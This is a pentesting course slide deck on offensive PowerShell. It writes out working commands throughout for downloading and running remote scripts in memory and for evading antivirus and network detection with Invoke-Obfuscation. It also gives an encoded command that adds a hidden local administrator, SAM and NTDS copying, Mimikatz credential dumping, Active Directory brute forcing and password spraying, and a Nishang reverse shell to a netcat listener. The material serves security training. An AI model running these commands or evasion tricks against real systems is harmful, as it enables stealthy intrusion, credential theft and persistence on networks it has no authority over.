Scribd
Upload
74 views164 pages

Section 3 Module 3 Offensive PowerShell

Uploaded by

es169371
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
74 views164 pages

Section 3 Module 3 Offensive PowerShell

Uploaded by

es169371
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

3.

1 Downloading & Execution

3.2 Obfuscation

3.3 Information Gathering & Recon

3.4 Post-Exploitation With PowerShell


Penetration Testing Professional 5.0 – Caendra Inc. © 2018
By the end of this module, you should have a better understanding of:

✓ PowerShell tools we can leverage for penetration testing.

✓ Expanding the use of PowerShell for offensive purposes.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Penetration Testing Professional 5.0 – Caendra Inc. © 2018
The ability to download and execute files on our target systems is,
of course, a necessary process in our quest to maintain footholds
and persistence within a target network.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Being able to do so with tools that are already built-in to the
operating system (i.e., Living off the Land) is even more important
as it helps evade endpoint security measures and application
whitelisting solutions by using tools that are likely already
“trusted.”

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Additionally, being able to download and execute files with
PowerShell is even more advantageous in many cases, since we’re
able to operate entirely within the memory process of PowerShell,
and can avoid dropping artifacts to disk in many cases.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


There are two primary ways we can download and execute code
in regards to strictly using PowerShell and built in .Net classes or
COM objects:

1. An executable or script is downloaded to disk, which can then


be executed by PowerShell itself, or by using other executables
on the system to execute our code.
2. An executable or script is downloaded and run within the
PowerShell process memory, and never touches the disk.
(Preferred Method)

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


A summary of methods we can use for “In-Memory” execution
with PowerShell version 2.0: (preferred methods)
• [Link] DownloadString • [Link] COM Object
Method • [Link] COM
• [Link] DownloadData Object
Method • [Link] Com
• [Link] OpenRead method Object
• .NET [[Link]] class • [Link] w/ -ping argument
• [Link] COM Object

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


A summary of methods we can use for “Disk-Based” execution
with PowerShell version 2.0

• [Link] DownloadFile method


• [Link]
• [Link] w/ -urlcache argument

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


These two methods (in-memory and disk-based) are usually
accomplished using what are commonly referred to as “Download
Cradles,” and use the “[Link]” .Net System Class
among other classes, COM objects or other Windows-native
executables to achieve this.

[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Most of the time, we use the “New-Object” cmdlet.

The New-Object cmdlet, as its name infers, allows us to create


instances (objects) of either .Net or COM objects.

Let’s take a look at several examples.

[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The most common download cradle we’ll see in the field uses the
“iex” (Invoke-Expression) alias along with the [Link] class
and the “DownloadString” method, which downloads and
executes a remotely hosted powershell script, and can be done
with a command like the following:
PS C:\> iex (New-Object [Link]).DownloadString(“[Link]

[Link]
[Link]
[Link]
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
We can run the same command from a standard windows
command prompt:
C:\> [Link] iex (New-Object [Link]).DownloadString(‘[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Notice the differences in the two commands, one done from
within the powershell console, and the other called from [Link].

The DownloadString URL for the latter uses single quotes when run
from [Link], and double-quotes when initiating it from
[Link].
PS C:\> iex (New-Object [Link]).DownloadString(“[Link]

C:\> powershell iex (New-Object [Link]).DownloadString(‘[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


We can also break the above PowerShell commands down and
execute them directly via the console with something like the
following as well:
Instantiate our
[Link] class
as the $downloader variable

Create our $payload PS C:\> $downloader = New-Object [Link]


variable (URL to the script) PS C:\> $payload = "[Link]
PS C:\> $command = $[Link]($payload)
Create our $command PS C:\> Invoke-Expression $command
variable

Execute our $command


with the “Invoke-
Expression” (iex) cmdlet

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


To demonstrate how this works, let’s create a really simple single-
command powershell script with the following contents, which we
then host on our attacker system:
Get-ProcessPaths.ps1

The above script will simply list all system processes and provide
the Process name, and paths to the process executables.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Once we’ve
hosted our script,
we can simply call
it from the
powershell
console with the
[Link]
object and
DownloadString
method:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The “DownloadString” method will execute our remote script in
the PowerShell process memory, so in regards to not dropping an
artifact to disk, it’s a great way to stay under the radar of endpoint
security solutions that are not monitoring powershell memory.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Important: Evasion Tips

It should be noted that where possible when hosting your remote


PowerShell script, to have an SSL certificate configured on the
attacker machine.

This helps in evading over-the-wire heuristics as our traffic will go


over HTTPS.

In the previous examples, we simply used HTTP, which could easily


be detected.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Important: Evasion Tips
Another trick we can use which might help in evading basic file
extension heuristics is to give our PowerShell script a different
extension, for instance, “[Link].” PowerShell will still execute it as
a .ps1 script.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Important: Evasion Tips

There are many other ways we can decrease our probability of


being detected, and we will cover some of those ways in following
slides.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Important: Evasion Tips

It’s also important to note that the [Link] class allows us to


specify a custom user-agent string when sending the request to
our attacker URL.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Important: Evasion Tips

This can help us evade detection mechanisms that are flagging on


abnormal user-agent strings crossing the wire.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Important: Evasion Tips

We can do that with the “[Link]” method:


PS C:\> $downloader = New-Object [Link]
PS C:\> $[Link]("user-agent", "Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146
Safari/537.36")
PS C:\> $payload = "[Link]
PS C:\> $command = $[Link]($payload)
PS C:\> iex $command

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Important: Evasion Tips

We can see our user-agent string was sent as part of the


[Link] GET request

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Another [Link] class method we can use is the “DownloadFile” method.
This method will download your executable to disk.
Although noisy and not recommended if trying to remain stealthy, it’s still
sometimes a handy method to quickly download a file to the target system.
Instantiate our
[Link] class
as the $downloader variable

$payload URL variable PS C:\> $downloader = New-Object [Link]


PS C:\> $payload = "[Link]
$local_file variable (will
PS C:\> $local_file = "C:\programdata\[Link]"
save to this location)
PS C:\> $[Link]($payload,$local_file)
Call the object variable with
the “DownloadFile” method
and our $payload and
$local_file variables.
[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Executing the file once it’s on our target system can be
accomplished using the call operator (&) and variable we created
for the payload ($local_file):
PS C:\> $downloader = New-Object [Link]
PS C:\> $payload = "[Link]
PS C:\> $local_file = "C:\programdata\[Link]"
PS C:\> $[Link]($payload,$local_file)
PS C:\> & $local_file

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


It should also be noted that the [Link] class methods can
be configured to use the systems’ proxy and default credentials
with the following commands:
PS C:\> $downloader = New-Object [Link]
PS C:\> $payload = [Link]
PS C:\> $cmd = $[Link]($payload)
PS C:\> $proxy = [[Link]]::GetSystemWebProxy()
PS C:\> $[Link] = [[Link]]::DefaultCredentials
PS C:\> $[Link] = $proxy
PS C:\> iex $cmd

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Aside from the [Link] class, we can also use the
[Link] class to download and execute scripts on a target,
in memory.
Instantiate our
[Link]
class as the $req variable

Create a $res variable to PS C:\> $req = [[Link]]::Create("[Link]


store the WebRequest PS C:\> $res = $[Link]()
response PS C:\> iex ([[Link]]($[Link]())).ReadToEnd()

Use the “Invoke-Expression”


alias (iex) to invoke the
[Link]
and execute our code.

[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Similar to the [Link] class, the [Link] class can
also be configured to use a proxy as follows:
PS C:\> $req = [[Link]]::Create("[Link]
PS C:\> $res = $[Link]()
PS C:\> $proxy = [[Link]::GetSystemWebProxy()
PS C:\> $[Link] = [[Link]]::DefaultCredentials
PS C:\> $[Link] = $proxy
PS C:\> iex ([[Link]]($[Link]())).ReadToEnd()

[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The “[Link]” class allows us to execute a
powershell command (or any system command) contained within
an attacker hosted XML document and is another great way to
execute powershell code in memory, and in a way that is likely not
detected, especially when combined with a server over HTTPS.

[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


What we’ll want to do is create an XML file with the following
contents, which we’ll host on our attacker machine:
<?xml version="1.0"?>
<command>
<a>
<execute>Get-Process</execute>
</a>
</command>

The above xml file will simply list the system processes when
executed.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Next, once our xml file is hosted, we can use the [Link]
class with the “Load” method to download, and execute it:

PS C:\> $xmldoc = New-Object [Link]


PS C:\> $[Link]("[Link]
PS C:\> iex $[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Com Object
We can also use COM [Link]
Objects to both download [Link]

and execute scripts on a [Link]


[Link]
target system. Some of the
[Link]
COM objects available to us [Link]
for this purpose are: [Link].5.1 (Not Proxy Aware)

[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Take note that all of the above COM Objects are proxy-aware, and
will by default, use system configured proxies, except for the
“[Link].5.1” object, although that object can be
configured to use one if needed.

[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


We can utilize the COM objects in the same way we do with the
[Link] objects, by using the “New-Object” cmdlet, but
with the “-ComObject” parameter.

In the below, we’re utilizing the “[Link]” object for


executing a remotely hosted PowerShell Script:
PS C:\> $downloader = New-Object –ComObject [Link]
PS C:\> $[Link](“GET”, “[Link] $false)
PS C:\> $[Link]()
PS C:\> iex $[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


And we can do the same with the “[Link].5.1”
object as well:
PS C:\> $downloader = New-Object –ComObject [Link].5.1
PS C:\> $[Link](“GET”, “[Link] $false)
PS C:\> $[Link]()
PS C:\> iex $[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Keep in mind, that all of the previous slides and future multi-line
commands we’re showing as examples, can also be done as one-
liners, by using a semicolon (;) to break up the commands:
$dl=New-Object –ComObject [Link]; $[Link](“GET”, “[Link] $false); …etc

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Alternatively, it can be wrapped up into a script and be executed
that way as well.

C:\> [Link] .\downloader.ps1


OR
PS C:\> .\downloader.ps1

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


With all of these examples, when executing the download cradles
from a windows command prompt or shell, or when launching the
[Link] executable, make sure to include the –
ExecutionPolicy Bypass and –Window Hidden options
we covered in the Fundamentals module.

This will ensure we can run our scripts and that the powershell
window stays hidden from the end-user.
C:\> [Link] –ExecutionPolicy bypass –Window hidden .\downloader.ps1

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


A great tool we can use to help us craft obfuscated download
cradles is known as “Invoke-CradleCrafter” by Daniel Bohannon.

We encourage you to explore that tool, in addition to getting


familiar with the manual methods we covered.

[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Penetration Testing Professional 5.0 – Caendra Inc. © 2018
As endpoint security solutions catch up with attacker methods and
implement numerous heuristics and detection signatures to catch
powershell commands as they’re being executed, we turn to
obfuscation as a layer in helping us evade those defenses.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


One of the more
well-known
frameworks we
can use for this
purpose is Daniel
Bohannon’s
Invoke-
Obfuscation.

[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Invoke-Obfuscation offers us some excellent options we can use to
obfuscate and encode our powershell commands or script blocks
using a number of methods including AES encryption with the
“SecureString” method, to special characters and even whitespace
encoding.

We’ll cover several examples in the following slides.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


We’ll first need to download the Invoke-Obfuscation framework
into our modules directory, same as we did for the PowerSploit
example in the Fundamentals lesson module.

We can download the [Link] for Invoke-Obfuscation from


github here:
[Link]
Obfuscation/archive/[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


We can find a modules path to use by executing the following from
the PowerShell console:
PS C:\> $env:PSModulePath

In our case, we’ll use the first path:


C:\users\user\Documents\WindowsPowerShell\Modules

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Once we download and extract the Invoke-Obfuscation package
into our modules directory into a folder called “Invoke-
Obfuscation,” we should be able to import it into our current
PowerShell session:

PS C:\> Import-Module Invoke-Obfuscation

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


PS C:\> Invoke-Obfuscation
Once we’ve imported the
Invoke-Obfuscation
modules, we can then
launch the framework
with the Invoke-
Obfuscation command,
and are then presented
with several different
options we can use:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


We have several different options we can use to obfuscate
our PowerShell commands:
• TOKEN - Obfuscate PowerShell command Tokens
• AST - Obfuscate PowerShell Ast nodes (PowerShell 3.0 and greater)
• STRING - Obfuscate entire command as a String
• ENCODING - Obfuscate entire command via Encoding
• COMPRESS - Convert entire command to one-liner and Compress
• LAUNCHER - Obfuscate command args w/Launcher techniques (run
once at end)

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


For our purposes, we’ll show some use cases with the String and
Encoding methods.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


First, in order to tell Invoke-Obfuscation what we’d like to
obfuscate exactly, we first need to use the “SET SCRIPTBLOCK”
command.

As an example of a script block we can use, let’s take a standard


[Link] download cradle:
iex (New-Object [Link]).downloadstring("[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The download cradle from the previous slide, when executed on
our target, will use the [Link] class, and will download and
execute our “Get-ProcessPaths.ps1” script from our attacker
machine, which will simply list running processes on our target.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Let’s set that as the “SCRIPTBLOCK” in Invoke-Obfuscation as the command we want to obfuscate
with the “SET SCRIPTBLOCK” command:
Invoke-Obfuscation> SET SCRIPTBLOCK iex (New-Object
[Link]).downloadstring("[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Once we’ve told Invoke-Obfuscation what we’d like to obfuscate with the SET
SCRIPTBLOCK command, we can select a method we’d like to use. Let’s use the
“STRING” method to start as an example. We simply type “STRING” and are
presented with several options for that method:
Invoke-Obfuscation> STRING

We have three options with the “STRING” obfuscation method. Let’s go with
option “3,” the “Reverse” method.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The “REVERSE” method will first concatenate our PowerShell
command line and then reverse the entire string.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Once we select and run the option we want (in this case, “3”), Invoke-Obfuscation
presents us with the command it used to create the obfuscated string block, along with
the result of the command. It’s the result of the command we will execute on our target
system.

PS C:\> $Lqi7O ="NoisseRpXE-EKOvnI| )43]rahc[ f-


Obfuscated command )')'+'}0'+'{1'+'[Link]'+'taPsse'+'corP-
teG/26.31.'+'8'+'61'+'.291/'+'/:'+'p'+'tt'+'h}0{('+'g'+'n'+'irtsdao'+'lnwo'+'
we ultimately execute d'+'.)'+'tneilcb'+'e'+'[Link]'+' tce'+'jbO-weN'+'('+' '+'x'+'ei'(( ";
on the target: [STRinG]::JOIN( '' ,$Lqi7O[ -1.. -($[Link] ) ]) |IeX

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


We can just copy and paste the “Result” output to our target
system in a powershell prompt, and it will execute our download
cradle:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Let’s take a look at the results of the “ENCODING” method, which
provides a bit more obfuscation, and is a bit harder to detect.
Option 7, for example, is the “Special Characters” encoding.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Running that method against our script block returns us a heavily
obfuscated string.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Again, we simply
paste the
resulting output
into a powershell
console on our
target machine:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


If we’re operating from a windows command prompt on the target,
instead of a powershell console, we can use the
[Link] -Command option to run our obfuscated
commands, just encapsulate the result with quotes:
Quote

Quote

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


You should experiment with all of the obfuscation options available
with Invoke-Obfuscation, there’s a lot of great stuff in there, and
much of it still bypasses most antivirus solutions.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Important
Something to note while using Invoke-Obfuscation is that if you’ve
applied a method to a script block, and then re-apply another
method, it will append to a previous script block, and essentially
create a very large result.

You’ll notice this when you try to apply a method and receive a
warning about the command exceeding [Link]’s maximum
command length:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Important

To get around this, after applying one particular encoding method,


use the “RESET” option to clear previous encodings, this way, they
won’t “pile up” on one another.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


In addition to obfuscating our PowerShell commands, we can also create
obfuscated launcher commands to run our obfuscated code on the target using
the “LAUNCHER” option. For instance, if we want to use WMIC to launch our
obfuscated code, we can quickly generate a command to do so. The available
LAUNCHER options are:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The process for using the LAUNCHER option is that we first create our obfuscated
commands as we did previously:

1. We SET SCRIPTBLOCK with the code we want to execute.


2. We select an obfuscation method to generate the obfuscated command.
3. We then use the LAUNCHER
option at the end of this
process.

In this example, we’ll assume we


followed the above steps, and now
select our LAUNCHER command.
We’ll choose the RUNDLL method.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


And then the command line options we’d like to use as well, in this
case, we’ll choose “0” for No Execution Flags:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The resulting string, is an obfuscated command that utilizes
[Link] with the “[Link]” function (ShellExec_RunDLL)
which will launch our obfuscated powershell code on the target:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Invoke-Obfuscation
includes a “Tutorial”
option if you’re
stuck and need
some guidance on
some of its options:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Although not really a recommended “obfuscation” method since it
can be easily detected by Antivirus and other string heuristics,
considering it’s just base64 encoding, is PowerShell’s –
EncodedCommand parameter.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The -EncodedCommand parameter allows us to execute
encoded commands or script blocks which contain characters
which might interfere with the processing of our command via a
windows command prompt.

In simpler terms, it makes complex commands “digestible” by


PowerShell by encoding everything with Base64.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


As an example, to encode a command that will add a new user
“admin1” to the local administrator’s group, we can do the
following:
PS C:\> $command = ‘net user admin1 “p@ssw0rd9001” /ADD; net localgroup administrators admin1 /add’
PS C:\> $bytes = [[Link]]::[Link]($command)
PS C:\> $encodedCommand = [Convert]::ToBase64String($bytes)

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


We can then get the results of our encoded command with the
“Write-Host” cmdlet against our $encodedCommand variable:

PS C:\> Write-Host $encodedCommand


bgBlAHQAIAB1AHMAZQByACAAYQBkAG0AaQBuADEAIAAiAHAAQABzAHMAdw
AwAHIAZAA5ADAAMAAxACIAIAAvAEEARABEADsAIABuAGUAdAAgAGwAbwBj
AGEAbABnAHIAbwB1AHAAIABhAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAH
MAIABhAGQAbQBpAG4AMQAgAC8AYQBkAGQA

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


We then execute our encoded command with the [Link] -
EncodedCommand parameter on the target:
C:\windows\system32> [Link] -encodedcommand
bgBlAHQAIAB1AHMAZQByACAAYQBkAG0AaQBuADEAIAAiAHAAQABzAHM
AdwAwAHIAZAA5ADAAMAAxACIAIAAvAEEARABEADsAIABuAGUAdAAgAG
wAbwBjAGEAbABnAHIAbwB1AHAAIABhAGQAbQBpAG4AaQBzAHQAcgBhA
HQAbwByAHMAIABhAGQAbQBpAG4AMQAgAC8AYQBkAGQA

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Penetration Testing Professional 5.0 – Caendra Inc. © 2018
PowerShell, as we’ve seen, is largely a tool we use for post-
exploitation simply due to its capability, and its availability on
systems we have access to.

Naturally, it is a post-exploitation tool. However, we can also use it


to conduct Information Gathering and Reconnaissance as well.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


There are several third-party tools, built-in cmdlets, and
frameworks that exist that can help us with these tasks, and we
will cover some of those tools and their various components to
accomplish different things.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


One of the first steps in our pentesting methodology is that of
Information Gathering and Recon.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The idea is to be able to leverage powershell for many of our
pentesting activities.

Again, considering its availability already on systems we’ve


compromised, its ease-of-use and capabilities, or simply because
the customer would like to have us perform the penetration test
from a machine that they supply.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


In that case, it becomes useful to be able to utilize powershell to
conduct many of our tasks when we’re limited in regards to our
toolset and unable to bring along all of the tools in our arsenal.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


One of our first steps should be the discovery of hosts and port
scans on the network we’re operating on.

As we saw in a previous module, we can do port scans with a one-


liner like the following, without requiring any third-party modules:
PS C:\> $ports=(80,8080,443,22);$ip=“[Link]"; foreach ($port in
$ports) {try{$socket=New-Object
[Link]($ip,$port);} catch{}; if ($socket -eq
$null) {echo $ip":"$port" - Closed";}else{echo $ip":"$port" -
Open"; $socket = $null;}}

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The above may be useful for a targeted probe, but not in the case
where we want to scan an entire net block as it only allows for
scanning of one IP address at a time.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


One tool we can use for efficient discovery of hosts on a network
and is included with the PowerSploit framework is the “Invoke-
Portscan” cmdlet.

[Link]
[Link]
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
First, we can utilize Invoke-PortScan to execute a ping scan (-
PingOnly) against our target network range in CIDR notation with
the “-Hosts” parameter in an attempt to identify live hosts:
PS C:\> Invoke-Portscan -Hosts "[Link]/24" -PingOnly

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


PS C:\> Invoke-Portscan -HostFile [Link] -PingOnly

We can also supply


a file containing a
list of IP addresses
with the -HostFile
parameter. The
results of which will
show “True” for live
hosts:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


To save our results, we can pipe it to the “Export-Csv” cmdlet.
PS C:\> Invoke-Portscan -HostFile [Link] –PingOnly | Export-Csv C:\ping_scan.csv

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Once we’ve identified live hosts, we can then conduct port scans
using the -ports parameter.

Open ports will be identified by the “openPorts” value:


PS C:\> Invoke-Portscan -HostFile live_hosts.txt -ports "53-81"

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Another useful feature of Invoke-PortScan is the ability to output in a greppable
“.gnmap” Nmap format with the -oG and -f parameters:
PS C:\> Invoke-Portscan -HostFile live_hosts.txt -oG port_scan.gnmap -f -ports "1-81"

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


For a tool similar to what we’re used to for enumerating files and
directories on web servers, i.e., dirsearch, dirb, etc., we can use
PowerSploit’s “Get-HttpStatus” command.

[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Get-HttpStatus works in conjunction with a dictionary (-Path), like
other similar tools, and when used in conjunction with the
“Where-Object” alias (?) will return a list of pages or directories on
the web server:
PS C:\> Get-HttpStatus -Target [Link] -Path [Link] -Port 80 |
>> ? {$_.Status -match "ok"}

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Another useful cmdlet we can use for host discovery, and is part of
Carlos Perez’s Posh-SecMod framework, is “Invoke-ARPScan” and
may generate fewer alerts than your usual SYN or TCP scan.
PS C:\> Invoke-ARPScan -CIDR [Link]/24

MAC Address
--- -------
[Link] [Link]
[Link] [Link]
[Link] [Link]

[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Posh-SecMod has several useful cmdlets we can use for host
discovery purposes among others.

We encourage you to explore their capabilities.


PS C:\> Get-Command –Module Posh-SecMod

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


For reverse DNS lookups, we can use Posh-SecMod’s “Invoke-
ReverseDNSLookup” cmdlet against a target CIDR block.
PS C:\> Invoke-ReverseDnsLookup -CIDR [Link]/24

HostName Aliases AddressList


-------- ------- -----------
[Link] {} {[Link]}
[Link] {} {[Link]}
[Link] {} {[Link]}
[Link] {} {[Link]}

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


A couple of other DNS-related cmdlets within Posh-SecMod that
are also useful for enumerating DNS are Resolve-HostRecord and
Resolve-DNSRecord.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Resolve-HostRecord

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Resolve-DNSRecord

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Now that we’ve covered some remote Information Gathering and
Recon methods with PowerSploit and Posh-SecMod, let’s explore
some other tools we can utilize for Post-Exploitation, which is
where our ability to leverage PowerShell really starts to shine.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


First, let’s explore another excellent post-exploitation framework,
known as “Nishang,” by Nikhil Mittal.

Nishang brings together some of the best tools from other


frameworks, in addition to Nishang-native tools as well.

[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


IMPORTANT

As we mentioned previously about Antivirus and the detection of


powershell and other exploitation frameworks, Nishang is no
exception, and its various modules will likely be detected if
imported directly to the target system.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


IMPORTANT
Therefore, it’s important to make sure that most of the tools and
scripts we invoke should be invoked via download cradles that
support in-memory execution. For most of the examples that
follow, we’ll be using the [Link] and
DownloadString method to execute our scripts in memory.

Once we’ve hosted the Nishang framework scripts on our attacker


system, we can begin.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Let’s explore some of the “Gather” modules.

These modules will help us get information from our target system
locally, that we could potentially use to move laterally for instance.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The “Copy-VSS” module will attempt to copy the SAM database
using the VSS service, and if run on a domain controller, will try
and copy the [Link] and contents of the SYSTEM registry hive.

We can try it with the following command:


PS C:\> iex (New-Object [Link]).DownloadString(“[Link] Copy-VSS

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The command on the previous slide will copy the contents of the
SYSTEM registry hive and the SAM file to the current working
directory on the target.

These can then be cracked offline.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The “Get-Information” cmdlet will get us a good deal of system
information including:
• PuTTY trusted hosts • Domain Name
• PuTTY Saved sessions • Content of hosts file
• Recently used commands • Running Services
• Shares on the target machine • Account Policy
• Environment Variables • Local Users
• Current user details • Local Groups
• SNMP information • WLAN Info
• Installed applications

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


We can download and execute it in memory with our
[Link] DownloadString download cradle:
iex (New-Object [Link]).DownloadString('[Link] Get-Information

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Get-PassHints we can use to dump the saved Password Hints for
users on the system:
iex (New-Object [Link]).DownloadString('[Link] Get-PassHints

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The Invoke-Mimikatz cmdlet will dump clear-text credentials (or hashes) from memory. Note,
that we can also pass command line parameters to any of the modules that have additional
options as part of our download cradle commands:
iex (New-Object [Link]).DownloadString('[Link] Invoke-
Mimikatz -DumpCreds

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


There are plenty of other very useful Nishang “gather” modules
which will come in handy for our post-exploitation purposes,
explore!

[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


As part of its catalog, Nishang includes a great brute force tool “Invoke-BruteForce.” We can use this
to brute force Active Directory accounts, SQL Server, Web or FTP servers. The great thing about a
brute force tool written in PowerShell is that we can execute the attack from our target host as long
as we copy a file containing usernames and passwords to our target.
PS C:\> Invoke-BruteForce –ComputerName [Link] –UserList C:\temp\[Link]
–PasswordList C:\temp\[Link] –Service ActiveDirectory –StopOnSuccess -Verbose

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Invoke-BruteForce is also a great tool for executing a password
spray attack against Active Directory.

Just ensure that your password list contains a single password.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The “Invoke-PowerShellTcp” cmdlet within the Nishang framework
provides an excellent way to obtain a reverse PowerShell shell
from our target host back to a netcat listener.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Keep in mind that if using this method, take into consideration that
the traffic is traversing the wire in cleartext between attacker and
target.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Although a great and undetected (by Antivirus) method to get a
reverse shell from PowerShell, over-the-wire heuristics (SIEM) may
pick up some of the back and forth chatter if that type of solution
has been implemented within an organization.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


To use this, we should first fire up a netcat listener on our attacker
machine.

We’ll configure it on port 4444 for this example.


# nc -nlvp 4444

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Next, we can simply invoke it using a download cradle from the
target system, this time, from a windows command prompt on the
target.
C:\> [Link] –Command iex (New-Object
[Link]).DownloadString(‘[Link]
Invoke-PowerShellTcp -Reverse -IPAddress <listener_IP> -Port 4444

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


And on our listener, we should receive a connect back from the
target, into a PowerShell prompt:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


There are several different shells, both bind, reverse, ICMP, UDP shells, and some more
complex “rat”-type shells we can utilize from Nishang. Experiment with the different
types:

Invoke-JSRatRegsvr.ps1: [Link]
Invoke-JSRatRundll.ps1: [Link]
Invoke-PoshRatHttp.ps1: [Link]
Invoke-PoshRatHttps.ps1: [Link]
Invoke-PowerShellIcmp.ps1: [Link]
PowerShellIcmp.ps1
Invoke-PowerShellTcp.ps1: [Link]
PowerShellTcp.ps1
Invoke-PowerShellTcpOneLine.ps1: [Link]
PowerShellTcpOneLine.ps1

